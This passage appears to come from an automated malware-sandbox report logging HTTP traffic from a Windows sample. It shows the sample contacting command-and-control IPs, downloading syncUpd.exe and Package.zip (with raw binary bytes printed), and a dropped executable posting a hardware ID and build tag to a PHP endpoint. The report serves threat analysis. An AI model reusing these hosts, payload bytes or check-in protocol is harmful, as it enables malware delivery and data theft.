                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.312439919 CEST191OUTGET /ping.php?substr=five HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.523858070 CEST147INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:03:57 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.449732185.172.128.59805288C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.741254091 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.59
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949142933 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:03:57 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Thu, 25 Apr 2024 07:00:02 GMT
                                                                                                                                                                                                                            ETag: "44200-616e6560d4ed7"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 279040
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 8e a8 0b d1 ef c6 58 d1 ef c6 58 d1 ef c6 58 cf bd 53 58 c0 ef c6 58 cf bd 45 58 b2 ef c6 58 cf bd 42 58 fb ef c6 58 f6 29 bd 58 d4 ef c6 58 d1 ef c7 58 bb ef c6 58 cf bd 4c 58 d0 ef c6 58 cf bd 52 58 d0 ef c6 58 cf bd 57 58 d0 ef c6 58 52 69 63 68 d1 ef c6 58 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 22 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 16 82 02 00 00 00 00 4c 16 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 82 02 00 04 00 00 b1 d4 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 42 03 00 3c 00 00 00 00 80 81 02 68 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 a6 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 8a 02 00 00 c0 00 00 00 8c 02 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 22 7e 02 00 50 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 e0 00 00 00 80 81 02 00 e2 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 c4 c1 40 00 e9 75 02 00 00 cc cc
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XXXSXXEXXBXX)XXXXLXXRXXWXXRichXPEL"OdL@pLB<hx.text `.rdata@@.data"~P(8@.rsrch`@@@u
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949219942 CEST1289INData Raw: cc cc cc 56 8b f1 c7 06 c4 c1 40 00 e8 62 02 00 00 f6 44 24 08 01 74 09 56 e8 9e 03 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 51 8b 46 0c 85 c0 74 1a 8b 0c 24 57 8b 7e 10 51 e8 7b 00 00 00 8b 56 0c 52 e8 6b 03 00 00 83
                                                                                                                                                                                                                            Data Ascii: V@bD$tV^QFt$W~Q{VRk_PFFFJQ1YQ!YD$VPf@^V;t-~rFP3FFfN
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949265003 CEST1289INData Raw: 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f 95 c1 89 4d e4 eb 03 89 75 e4 33 db 43 53 e8 7f 3c 00 00 59 85 c0 75 08 6a 1c e8 58 ff ff ff 59 e8 e0 3a 00 00 85 c0 75 08 6a 10 e8 47 ff ff ff 59 e8 73 36 00 00 89 5d fc e8
                                                                                                                                                                                                                            Data Ascii: @ut@v39@Mu3CS<YujXY:ujGYs6]4}j(Y|@b2mC1}j(Yv/}j(YSw)Y;tP(Y.]tMjYQPVh@E9uuP*+}5EMPQP-
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949311018 CEST1289INData Raw: 45 fc 5f 5e 5b c9 c3 8b ff 55 8b ec 8b 45 0c 56 8b 75 08 89 06 e8 b1 34 00 00 8b 80 98 00 00 00 89 46 04 e8 a3 34 00 00 89 b0 98 00 00 00 8b c6 5e 5d c3 8b ff 55 8b ec e8 8e 34 00 00 8b 80 98 00 00 00 eb 0a 8b 08 3b 4d 08 74 0a 8b 40 04 85 c0 75
                                                                                                                                                                                                                            Data Ascii: E_^[UEVu4F4^]U4;Mt@u@]3]UVf4u;uV4N^]E4H;txu^]DNHU0PCeM3MEEEE@E@MEdEEdu
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949445963 CEST1289INData Raw: 5c 1f 40 00 64 1f 40 00 77 1f 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95
                                                                                                                                                                                                                            Data Ascii: \@d@w@DDDDDDDDDDDDDD$@@@@@E^_FGE^_IFGFGE^_FGFGFGE^_UEqC]U(0PC3ESjLjP(
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949493885 CEST1289INData Raw: e8 3e fd ff ff 83 38 2a 75 0f 8b cf b0 3f e8 64 ff ff ff 83 7d 08 00 7f d5 5e 5b 5d c3 8b ff 55 8b ec 81 ec 78 02 00 00 a1 30 50 43 00 33 c5 89 45 fc 53 8b 5d 0c 56 8b 75 08 33 c0 57 8b 7d 14 ff 75 10 8d 8d a4 fd ff ff 89 b5 b4 fd ff ff 89 bd dc
                                                                                                                                                                                                                            Data Ascii: >8*u?d}^[]Ux0PC3ES]Vu3W}ulu53PPPPP<t`pF@u^VGY UCttQA
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949538946 CEST1289INData Raw: 58 0f 84 da 02 00 00 48 48 74 79 2b c1 0f 84 27 ff ff ff 48 48 0f 85 9e 04 00 00 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 74 30 0f b7 47 fc 50 68 00 02 00 00 8d 85 f4 fd ff ff 50 8d 85 e0 fd ff ff 50 e8 d6 4f 00 00 83 c4 10 85 c0
                                                                                                                                                                                                                            Data Ascii: XHHty+'HHt0GPhPPOtG5;t;H;t4t+QCPGYp
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949587107 CEST1289INData Raw: 9d e0 fd ff ff 2b 9d d0 fd ff ff f6 85 f0 fd ff ff 0c 75 17 ff b5 b4 fd ff ff 8d 85 d8 fd ff ff 53 6a 20 e8 70 f5 ff ff 83 c4 0c ff b5 d0 fd ff ff 8b bd b4 fd ff ff 8d 85 d8 fd ff ff 8d 8d d4 fd ff ff e8 76 f5 ff ff f6 85 f0 fd ff ff 08 59 74 1b
                                                                                                                                                                                                                            Data Ascii: +uSj pvYtuWSj0.tf~bPjEPFPFpJu(9t MYuP
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949631929 CEST1289INData Raw: 04 56 89 35 c0 62 c1 02 e8 fe 43 00 00 59 59 a3 b8 52 c1 02 85 c0 75 05 6a 1a 58 5e c3 33 d2 b9 b8 51 43 00 eb 05 a1 b8 52 c1 02 89 0c 02 83 c1 20 83 c2 04 81 f9 38 54 43 00 7c ea 6a fe 5e 33 d2 b9 c8 51 43 00 57 8b c2 c1 f8 05 8b 04 85 a0 51 c1
                                                                                                                                                                                                                            Data Ascii: V5bCYYRujX^3QCR 8TC|j^3QCWQt;tu1 B(RC|_3^W=HqCtUU5RYUVuQC;r"TCw+Q'JNY V@^]UE}PI
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.949656963 CEST1289INData Raw: 00 00 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 84 39 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 98 38 40 00 ff 24 8d 94 39 40 00 90 ff 24 8d 18 39 40 00 90 a8 38 40 00 d4 38 40 00 f8 38 40
                                                                                                                                                                                                                            Data Ascii: ur*$9@r$8@$9@$9@8@8@8@#FGFGr$9@I#FGr$9@#r$9@I{9@h9@`9@X9@P9@H9@@9@89@DDDD
                                                                                                                                                                                                                            Apr 25, 2024 09:03:58.157120943 CEST1289INData Raw: 00 33 c0 5e c3 6a 0c 68 48 3d 43 00 e8 29 f8 ff ff e8 65 01 00 00 83 65 fc 00 ff 75 08 e8 f8 fe ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 45 f8 ff ff c3 e8 44 01 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0
                                                                                                                                                                                                                            Data Ascii: 3^jhH=C)eeuYEEEEDUuYH]UEqC]U5qCYtuYt3@]3]UE8csmu*xu$@= t=!t="t=@u!3]h=@@3UWW@u


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.449733176.97.76.106805288C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.106939077 CEST185OUTGET /1/Package.zip HTTP/1.1
                                                                                                                                                                                                                            Host: note.padd.cn.com
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345608950 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 06:48:51 GMT
                                                                                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                                                                                            Content-Length: 3884863
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            ETag: "66289c8a-3b473f"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec 84 e0 32 28 87 9a 39 6a c5 df 17 d5 9c fd f8 21 c1 24 f7 ea 96 9c 3c 3c 0f 86 c4 8d da 50 23 62 d7 15 4c 6a a1 44 97 76 47 c4 2b b4 7d af 54 82 03 36 74 52 d5 17 62 d9 22 e9 c4 9b 6f 84 66 a5 87 ef 68 3e cd 2a b9 86 e7 ac 89 1a fa c7 99 5a 0f 1d 35 99 28 dd d7 19 f0 5d a4 8f a2 90 d9 1c a7 e0 a5
                                                                                                                                                                                                                            Data Ascii: PK?XIbunch.dat\]: "*TN<wfX $;e)|u]+U*V~fRje@frVJ-#U*=TE5Z&z'k%Je[5PB@.Gz[*-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O*:J%o`f+OW>SINCm6|wQxkKoD:n4P>*M_|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF|)@W6Z79d'`_6zr%a*7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>*Z5(]
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345675945 CEST1289INData Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a
                                                                                                                                                                                                                            Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345688105 CEST1289INData Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c
                                                                                                                                                                                                                            Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H|Im8z*n2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;*,.|j\[S
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345772982 CEST1289INData Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5
                                                                                                                                                                                                                            Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345786095 CEST1289INData Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a
                                                                                                                                                                                                                            Data Ascii: ><*:X4.`="+P!`p;KE.|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_|gYA#*8
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345797062 CEST1289INData Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43
                                                                                                                                                                                                                            Data Ascii: 94SI6j<TNmokj>*_P7!Wv}!K2@3Cs*-<HIo5 Q0V?4v^i2D5v$ip^`RLK$*.0 ^wS~W _h*:JIEE;/?j8-
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345851898 CEST1289INData Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8
                                                                                                                                                                                                                            Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345890045 CEST1289INData Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d
                                                                                                                                                                                                                            Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345917940 CEST1289INData Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb
                                                                                                                                                                                                                            Data Ascii: 2h\T^BTZP{@%{J.B|n$=6icc6%Zxn1#]|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.345931053 CEST1289INData Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25
                                                                                                                                                                                                                            Data Ascii: p_%cBeg3-Ul #B|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
                                                                                                                                                                                                                            Apr 25, 2024 09:04:00.588290930 CEST1289INData Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be
                                                                                                                                                                                                                            Data Ascii: MomvnhKB~`]2v=zim@M/Fa2|dov>vk3#qLj[G?&e<kl*9SA/vS/DMLaNjF[3);<g*2<pUyru{){N8gk{>|=r2WRBL]+=K


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            4192.168.2.449734185.172.128.76801720C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.482470989 CEST417OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 216
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.973778963 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:01 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 152
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
